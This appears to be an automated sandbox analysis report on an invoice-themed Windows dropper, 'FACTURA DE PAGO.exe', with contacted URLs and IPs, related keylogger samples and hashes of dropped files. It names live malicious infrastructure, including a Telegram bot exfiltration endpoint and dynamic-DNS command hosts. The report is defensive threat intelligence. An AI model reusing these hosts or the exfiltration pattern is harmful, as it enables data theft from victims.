https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	msiexec.exe, 00000004.00000002.2932772711.0000000022182000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022053000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000221D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000222A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	FACTURA DE PAGO.exe, FACTURA DE PAGO.exe.1.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	msiexec.exe, 00000004.00000002.2932772711.0000000022182000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022053000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000221D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000222A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000004.00000002.2931722428.00000000210C3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/155.94.241.186$	msiexec.exe, 00000004.00000002.2931722428.0000000020FBF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020F7A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://varders.kozow.com:8081	msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com	msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_Error	FACTURA DE PAGO.exe, FACTURA DE PAGO.exe.1.dr	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 00000001.00000002.1906039371.0000000006EA1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1906039371.0000000006F03000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1896848086.0000000004A51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/	msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	msiexec.exe, 00000004.00000002.2932772711.0000000021FE4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022280000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022188000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002215D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000004.00000002.2931722428.00000000210BE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/j$v	msiexec.exe, 00000004.00000002.2920754309.000000000540A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2034849572.000000000540A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	msiexec.exe, 00000004.00000002.2931722428.0000000020F50000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://apis.google.com	msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	msiexec.exe, 00000004.00000002.2932772711.0000000021FE4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022280000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022188000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002215D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1896848086.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000004.00000002.2931722428.0000000020F50000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
142.250.186.33	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
216.58.206.46	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538465
Start date and time:	2024-10-21 11:15:23 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FACTURA DE PAGO.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/14@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 95% Number of executed functions: 149 Number of non-executed functions: 65
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7864 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7460 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:16:15	API Interceptor	41x Sleep call for process: powershell.exe modified
05:16:53	API Interceptor	548566x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win64.Malware-gen.32485.11504.exe	Get hash	malicious	Python Stealer, Braodo	Browse
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
188.114.97.3	http://comodozeropoint.com/updates/1736162964/N1/Team.exe	Get hash	malicious	Unknown	Browse	comodozeropoint.com/updates/1736162964/N1/Team.exe
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	ZP4KZDHVHWZZ2DC13DMX.exe	Get hash	malicious	Amadey	Browse	tipinfodownload-soft1.com/g9jvjfd73/index.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/loadbit
	PO#071024.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exe	Get hash	malicious	Unknown	Browse	www.ergeneescortg.xyz/guou/
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/DyuQ5y15/download
	Payment.cmd	Get hash	malicious	Azorult, DBatLoader	Browse	dsye.shop/DS341/index.php
193.122.6.168	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	NEW CUSTOMER ORDER.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	KIDy5J5su4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Dekont-20241017-1100.00EFT-18901459.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	yugozxcvb.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ACCOUNTXSTATEMENT.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	14 EK#U0130M 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	QeV3tjOEuM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Quotation Botisk 1475-HIRSCH Technik,____________________________________________.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
api.telegram.org	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win64.Malware-gen.32485.11504.exe	Get hash	malicious	Python Stealer, Braodo	Browse	149.154.167.220
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	bin.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	130.61.149.67
	LNLAncf2v5.elf	Get hash	malicious	Mirai, Okiru	Browse	150.136.183.134
	SecuriteInfo.com.Win32.TrojanX-gen.28573.1762.exe	Get hash	malicious	Unknown	Browse	168.138.162.78
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	130.61.64.122
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	140.238.9.118
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	129.146.244.172
TELEGRAMRU	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Unlock_Tool_2.3.1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	aZm1EZ2IYr.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Unlock_Tool_2.4.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
	http://www.5movierulz.mom	Get hash	malicious	Unknown	Browse	172.67.72.9
	http://lvlup.page	Get hash	malicious	Unknown	Browse	172.67.184.158
	http://google.com	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://bbs-file.jiaxiao.pub/94f0e5e6a233429db4c5be400e2eb471/post/2024/03/29/933660672770703360.zip	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	172.67.155.139
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.53.8

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.DropperX-gen.11998.28068.exe	Get hash	malicious	Atlantida Stealer	Browse	188.114.97.3
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9	Get hash	malicious	Unknown	Browse	149.154.167.220
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	PAGO FRAS. AGOSTO 2024..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.33 216.58.206.46
	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	142.250.186.33 216.58.206.46
	450707124374000811.exe	Get hash	malicious	GuLoader	Browse	142.250.186.33 216.58.206.46
	450707124374000811.exe	Get hash	malicious	GuLoader	Browse	142.250.186.33 216.58.206.46
	3507071243740008011.exe	Get hash	malicious	GuLoader	Browse	142.250.186.33 216.58.206.46
	Unlock_Tool_2.3.1.exe	Get hash	malicious	Vidar	Browse	142.250.186.33 216.58.206.46
	3507071243740008011.exe	Get hash	malicious	GuLoader	Browse	142.250.186.33 216.58.206.46
	aZm1EZ2IYr.exe	Get hash	malicious	Vidar	Browse	142.250.186.33 216.58.206.46
	Unlock_Tool_2.4.exe	Get hash	malicious	Vidar	Browse	142.250.186.33 216.58.206.46
	JuyR4wj8av.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.186.33 216.58.206.46

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0htniaqs.pgk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41efao5z.m12.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_laf1hwwh.w4g.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlkuzx1i.pt2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	880319
Entropy (8bit):	7.714263627278454
Encrypted:	false
SSDEEP:	12288:l9LVa31WR5y/seQ/33WcLvfLn/ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0maD:/D5y/+/vfD/+alCJmvulW6Nd0vD
MD5:	DE02502F79BC183714A9DFE879831170
SHA1:	C1FD975E0DF663FD49E86AE1453D0AD3ECCACEA8
SHA-256:	9E3EF4DBB2D13139C75E1CBF855114111E6378FC518B7666F972442134D06718
SHA-512:	C921E2E02ED0969AD66AE503E3CC83D0E2A3C3D6D43814C8B31C3B8606CDE77E6F39C9A4B41088C0718B182A84DC29CAE5F609DFF872E98DCD00EF28C58B6415
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
